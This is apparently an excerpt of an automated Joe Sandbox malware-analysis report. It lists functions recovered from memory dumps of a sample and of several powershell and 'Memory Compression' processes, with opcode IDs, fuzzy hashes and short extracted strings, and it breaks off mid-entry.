                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                                                                                                  • Instruction ID: 485c318ef2fbcec4464f96a1be4025153ef4cbe7bf362f6b4decccbb0496f661
                                                                                                                                  • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                                                                                                  • Instruction Fuzzy Hash: 34C0123062D80E8FDA40BB28C889824BBA0FB0E202BD900E0E40CC71A1D629A8A08704
                                                                                                                                  Function 00007FF848F306A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 643015e1c7310c5d1a56e7e1db4f7d8a6ab91577b56fde5bd677069fa0ac72df
                                                                                                                                  • Instruction ID: 6e6084cc9a8e3b050b7bd66aed9672dc918f443fbb0b54aa150b109ff22d7bf9
                                                                                                                                  • Opcode Fuzzy Hash: 643015e1c7310c5d1a56e7e1db4f7d8a6ab91577b56fde5bd677069fa0ac72df
                                                                                                                                  • Instruction Fuzzy Hash: B9C08C20D1F80F0AF400B32E54020ACB1005BC4290FD00073C80C802C5AE0D21D5014E
                                                                                                                                  Function 00007FF848F36D1F Relevance: .0, Instructions: 11COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e285bcb5350578bfc6354630a2c943fd4351eb9812c3ac5b3f7cee5c6d657ec8
                                                                                                                                  • Instruction ID: f58071ae524c46a45692050642cd9ea274e9a3d93f944212269239acb0f213be
                                                                                                                                  • Opcode Fuzzy Hash: e285bcb5350578bfc6354630a2c943fd4351eb9812c3ac5b3f7cee5c6d657ec8
                                                                                                                                  • Instruction Fuzzy Hash: F6C00234E5C95A4FEAD8B37480662BD51C56F98380F441977E80ED32C3DE2C69408A48
                                                                                                                                  Function 00007FF848F32BEB Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 02190e3ade60953a71c343e1f9206f99112b7015b3e8e269b167955dc69d59dd
                                                                                                                                  • Instruction ID: 3d9ef6c4c5d78f9ee02e22c5b4e4bb60f31f2e938df3ce1222dc8f7702088ab5
                                                                                                                                  • Opcode Fuzzy Hash: 02190e3ade60953a71c343e1f9206f99112b7015b3e8e269b167955dc69d59dd
                                                                                                                                  • Instruction Fuzzy Hash: 66C08C10E0E82616E2157304442137F08028B40684FD04070E40D837CACE4C5A0102CA
                                                                                                                                  Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 51005e9a319c078acd7e7f91fb5d88e3f86524efe7ca5d68b5647fc29041d042
                                                                                                                                  • Instruction ID: 6d2d352fc4d639817ffe6f265097ac0568935237133427402c3926a8c89f344e
                                                                                                                                  • Opcode Fuzzy Hash: 51005e9a319c078acd7e7f91fb5d88e3f86524efe7ca5d68b5647fc29041d042
                                                                                                                                  • Instruction Fuzzy Hash: 90B01210C6F40F05E444337B084206470405B84144FC000B2D80C802C1994D10A4024E

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00007FF849335886 Relevance: .5, Instructions: 474COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2199832925.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849320000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc0fbc428fb11239d1bd497b46cffe95958e25feaca5a053ab04d2304ea1766d
                                                                                                                                  • Instruction ID: d699912afe65b58a7f57d0472bd5db42e99e44165b68a40db763cc31672aa191
                                                                                                                                  • Opcode Fuzzy Hash: bc0fbc428fb11239d1bd497b46cffe95958e25feaca5a053ab04d2304ea1766d
                                                                                                                                  • Instruction Fuzzy Hash: 8EF18F3091CA8E8FEBB8EF28C8557E937D1FB55350F04426EE84DC7291DB3899458B82
                                                                                                                                  Function 00007FF849329800 Relevance: .2, Instructions: 184COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2199832925.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849320000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7c12907002abf1c0e5892400c8064bc6fe8cd003139edb0fa40c8838d92fd459
                                                                                                                                  • Instruction ID: 20cbf6ba9fc66dadde2f1c18dd9cb616965ba4d9a0630f5d4efd510334574543
                                                                                                                                  • Opcode Fuzzy Hash: 7c12907002abf1c0e5892400c8064bc6fe8cd003139edb0fa40c8838d92fd459
                                                                                                                                  • Instruction Fuzzy Hash: 36517C70D1D6998FDB58EF64D4A5ABE77B1FF49340F44047AD00A972D2CE396841CB40

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FF848F4B8F8 Relevance: .3, Instructions: 266COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000020.00000002.3692465085.00007FF848F45000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F45000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_32_2_7ff848f45000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5164d5a0a3dd42d309e17bfc8eab77dd85e1da9dd7d908576d2235b52c4593a5
                                                                                                                                  • Instruction ID: dc36f3dd518516b0aa8bcbc0c56c1014b49ab02d66599da2c589b0036bb8f0bb
                                                                                                                                  • Opcode Fuzzy Hash: 5164d5a0a3dd42d309e17bfc8eab77dd85e1da9dd7d908576d2235b52c4593a5
                                                                                                                                  • Instruction Fuzzy Hash: 9F71593151CB884FE758EF2CC885AB57BE0EFA6361F1401BED08AC7197DA25A846C751
                                                                                                                                  Function 00007FF848F4A0FB Relevance: .3, Instructions: 254COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000020.00000002.3692465085.00007FF848F45000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F45000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_32_2_7ff848f45000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c49375eb54c98baf4a19d85bf2fbd1d6bec9742e3d85d6a69a959c3d78ad42f3
                                                                                                                                  • Instruction ID: 1a878222f9611aec9b50ab807c170579e98373ac8524f8a9ee6e6b2fea4ed3ee
                                                                                                                                  • Opcode Fuzzy Hash: c49375eb54c98baf4a19d85bf2fbd1d6bec9742e3d85d6a69a959c3d78ad42f3
                                                                                                                                  • Instruction Fuzzy Hash: FB114C7690EBC94FD7479B386C69094BFB0EEA3244B1901EBC489CF0E3D6194849CB52
                                                                                                                                  Function 00007FF848F496FA Relevance: .2, Instructions: 218COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000020.00000002.3692465085.00007FF848F45000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F45000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_32_2_7ff848f45000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 59052038284f134b27971472156cc021b80d66ef487b52bbbcbed670c20ec82a
                                                                                                                                  • Instruction ID: 6a03aa0def0885fe82def2fcece2feafc36f3bd3ff08471e434cdab992f0b53c
                                                                                                                                  • Opcode Fuzzy Hash: 59052038284f134b27971472156cc021b80d66ef487b52bbbcbed670c20ec82a
                                                                                                                                  • Instruction Fuzzy Hash: 6B613771E0DAC54FE706EB2868195B8BFE0FF61750F1442BFD048935E3EA19A8068786
                                                                                                                                  Function 00007FF848E2EF00 Relevance: .1, Instructions: 129COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000020.00000002.3664363113.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_32_2_7ff848e2d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 17a75e1050ea89b3ef904eca37b23fb3d223d1b58e2dad94de9dd10117f69614
                                                                                                                                  • Instruction ID: 446b496a1eecb54547552ba4bb23d95347295a0b94efaf30a3c4ebe1f333fe87
                                                                                                                                  • Opcode Fuzzy Hash: 17a75e1050ea89b3ef904eca37b23fb3d223d1b58e2dad94de9dd10117f69614
                                                                                                                                  • Instruction Fuzzy Hash: 3841F47180DBC54FE7569B2898559623FF0FF57360F1901DFD088CB1A3DA29A84AC7A2
                                                                                                                                  Function 00007FF848F433B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000020.00000002.3692465085.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                  • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                  • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00007FF848F484D3 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000020.00000002.3692465085.00007FF848F45000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F45000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_32_2_7ff848f45000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                                                                  • API String ID: 0-3188868157
                                                                                                                                  • Opcode ID: 73561df811345c8700faeaa89f3bfa3d2744841c251c9798112d414447b398ff
                                                                                                                                  • Instruction ID: 2b816186910089f66e2a79a61e00953644919cb737842d8b804de8e7e42e0758
                                                                                                                                  • Opcode Fuzzy Hash: 73561df811345c8700faeaa89f3bfa3d2744841c251c9798112d414447b398ff
                                                                                                                                  • Instruction Fuzzy Hash: CD418D73E1DAC64FE357573868750947FA0EF63A68B5A01FBC0C89F093EA1558479305

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FF84901660A Relevance: 6.7, Strings: 5, Instructions: 427COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2719870840.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff849010000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (B&I$(B&I$(B&I$(B&I$(B&I
                                                                                                                                  • API String ID: 0-1750599480
                                                                                                                                  • Opcode ID: 003089e71f7cb037618c3ccd38001135e64b6d8add498ba1ce47b22b6b487ee2
                                                                                                                                  • Instruction ID: 6ca526deb66ab6db6ef2db5bfdfb05c06dfb16dd61bb753984acf6894fa17fbf
                                                                                                                                  • Opcode Fuzzy Hash: 003089e71f7cb037618c3ccd38001135e64b6d8add498ba1ce47b22b6b487ee2
                                                                                                                                  • Instruction Fuzzy Hash: CCC13232D0EACA9FEB69AF2858165B57BA1EF15794F0801BBD04DC7093EA1AEC05C351
                                                                                                                                  Function 00007FF84901664D Relevance: 5.2, Strings: 4, Instructions: 248COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2719870840.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff849010000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (B&I$(B&I$(B&I$(B&I
                                                                                                                                  • API String ID: 0-899725410
                                                                                                                                  • Opcode ID: be028ffa4a16d20366e012e95ff3d88e9b4da5f02f05e5f89206c89fd294d2d6
                                                                                                                                  • Instruction ID: 0438142413238a2db42b84bb1cdaea9ab47f02d7280e0393cef0c0580c7ca200
                                                                                                                                  • Opcode Fuzzy Hash: be028ffa4a16d20366e012e95ff3d88e9b4da5f02f05e5f89206c89fd294d2d6
                                                                                                                                  • Instruction Fuzzy Hash: 4181F332D0EACA9FEBA9EF2858566347A91EF11794F5801FEC44CCB1C3EA1ADC458351
                                                                                                                                  Function 00007FF848F496FA Relevance: .2, Instructions: 216COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2710287967.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 143ccc2257d3aad02da9fedc4a6f9756b5fc3d1d2c0aecaf751fbcecd844942a
                                                                                                                                  • Instruction ID: 532e26e5975389d6b0a7523d097d8d7579b2bceea3c1613c5881588bb89016b6
                                                                                                                                  • Opcode Fuzzy Hash: 143ccc2257d3aad02da9fedc4a6f9756b5fc3d1d2c0aecaf751fbcecd844942a
                                                                                                                                  • Instruction Fuzzy Hash: A2611972F0DAC54FE706EB186C595A47FE0FF61750F1441BFD048935E3EA29A8068786
                                                                                                                                  Function 00007FF848E2EF00 Relevance: .1, Instructions: 126COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2702896040.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff848e2d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 07724ae709cb0b8cfaef8769749b80e79d1159d3aed58cfbd9fa478b43c81aa8
                                                                                                                                  • Instruction ID: 34dca673280edeee14745b413c6e3a3e790ebf254e2d4099c2e7ab022990b4c1
                                                                                                                                  • Opcode Fuzzy Hash: 07724ae709cb0b8cfaef8769749b80e79d1159d3aed58cfbd9fa478b43c81aa8
                                                                                                                                  • Instruction Fuzzy Hash: 8841E27180DBC44FE7569B299855A623FF0FF57360F1901DFD088CB1A3DA29A846C7A2
                                                                                                                                  Function 00007FF848F4A768 Relevance: .1, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2710287967.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8678d97b227648607f5dcf7d5d1f8a5f3dde38b515015a9d5d3b64be44465bda
                                                                                                                                  • Instruction ID: dd16fb980dcd2f68601011115d3b382904b8fd32147db07b35121ba702818c05
                                                                                                                                  • Opcode Fuzzy Hash: 8678d97b227648607f5dcf7d5d1f8a5f3dde38b515015a9d5d3b64be44465bda
                                                                                                                                  • Instruction Fuzzy Hash: AF21F53190CB4C8FDB58DF9C984A7E97BE0EBA6321F00416FD449C3152D674A85ACB92
                                                                                                                                  Function 00007FF848F433B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2710287967.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                  • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                  • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45
                                                                                                                                  Function 00007FF848F49CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2710287967.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9d9c59a0dd33f5f13ee817a3450910dad3c676faae2d670e89d91c22fc0561e2
                                                                                                                                  • Instruction ID: 1abed7c16787f63d6a94b5d87f9a51a536481879ee4b7e01b49e00c00d2674e8
                                                                                                                                  • Opcode Fuzzy Hash: 9d9c59a0dd33f5f13ee817a3450910dad3c676faae2d670e89d91c22fc0561e2
                                                                                                                                  • Instruction Fuzzy Hash: BBF0B43190C6CD4FDB4AEF28985A5E9BFE0EF26250F14029BE458C70B2DB659458CB82
                                                                                                                                  Function 00007FF84901414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2719870840.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff849010000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 67d80223e5baf9d1a01df2139e32e62a1a775cc82e3999724ef65f50b109cefa
                                                                                                                                  • Instruction ID: af39183ec23069d6745ea0cf38c4ec06b3cf3f9ce874ef1d5f36002e82a7645e
                                                                                                                                  • Opcode Fuzzy Hash: 67d80223e5baf9d1a01df2139e32e62a1a775cc82e3999724ef65f50b109cefa
                                                                                                                                  • Instruction Fuzzy Hash: 16F0BE32A0C5858FDB68EF0CE4068E8B3E0EF55360B1500BAE01DC71A3EB26EC408744
                                                                                                                                  Function 00007FF849014400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2719870840.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff849010000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90520268171c9efae3c1b5ca6b199054ae578daaf4e68469aa2660cbc586b9cf
                                                                                                                                  • Instruction ID: 46d7963a9c737c59fcf2a3b7c2b262a0a371f42a6b16887f05a4d079ba61ae7b
                                                                                                                                  • Opcode Fuzzy Hash: 90520268171c9efae3c1b5ca6b199054ae578daaf4e68469aa2660cbc586b9cf
                                                                                                                                  • Instruction Fuzzy Hash: D4F05832A0D5858FEB68EF1CE4468A8B7E0FF45361B5500B6E14ECB0A3EB26EC54C754
                                                                                                                                  Function 00007FF8490141D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2719870840.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff849010000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                  • Instruction ID: 9e336600eb526626126efe3c72cd31527a87a4d20ecec040aa8814cef1828420
                                                                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                  • Instruction Fuzzy Hash: EEE01A31B0C809CFDB78EE0CE0419E973E5EB9836171101B7D14EC7571DA22EC518B80

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00007FF848F484E3 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000022.00000002.2710287967.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                                                                  • API String ID: 0-3188868157
                                                                                                                                  • Opcode ID: 7b049d3c1a0501a88c4ebf055c48f8fcf2c4f4752a5caf5b9d3e52d918b18f56
                                                                                                                                  • Instruction ID: d7a069ceb13e9fb4f179091c75b8355c4cc37678765a44e6e2613912f3639ce5
                                                                                                                                  • Opcode Fuzzy Hash: 7b049d3c1a0501a88c4ebf055c48f8fcf2c4f4752a5caf5b9d3e52d918b18f56
                                                                                                                                  • Instruction Fuzzy Hash: 2F315C73D1EAC64FE357973868650947FA0EF63A68B5901FBC0C89B193EA19680A9305

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FF848F10D48 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 5[_H
                                                                                                                                  • API String ID: 0-3279724263
                                                                                                                                  • Opcode ID: f6d0b97510e38b349f3689eba5724c6230168348b9834a0cb541e332cf5c482c
                                                                                                                                  • Instruction ID: 72e1d48ed19025572d3ad8d8b03f8b18e8fcf5e0826f10409e477a4621244131
                                                                                                                                  • Opcode Fuzzy Hash: f6d0b97510e38b349f3689eba5724c6230168348b9834a0cb541e332cf5c482c
                                                                                                                                  • Instruction Fuzzy Hash: 5291E176D1DA999FE789EB2888693A97FE1FB95340F4400BAC109D73D2CFB81815CB11
                                                                                                                                  Function 00007FF848F10E43 Relevance: .2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06deb53b9db200a1b5630c97dd4e31c4b4fa92828abf5e8514f02c4ac0e862aa
                                                                                                                                  • Instruction ID: f79d770e1c4453448bb51dff2333962017811fcdfa1568eee65382289d0529c6
                                                                                                                                  • Opcode Fuzzy Hash: 06deb53b9db200a1b5630c97dd4e31c4b4fa92828abf5e8514f02c4ac0e862aa
                                                                                                                                  • Instruction Fuzzy Hash: 4051E176A19A5A8EE788EB2C88697A97FE1FBD5350F44017EC10AD33D5CFB91815CB00
                                                                                                                                  Function 00007FF848F108D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000034.00000002.2743758243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_52_2_7ff848f10000_Memory Compression.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a46bfaf7d7e50b08f99c5be242b971290cc474358f462d7af63a3f2bf616dcd5
                                                                                                                                  • Instruction ID: 6a55abcc31d186110a1bf0cf6e7f56c4f853e971fc8fe9bf2567693e8fb995f0
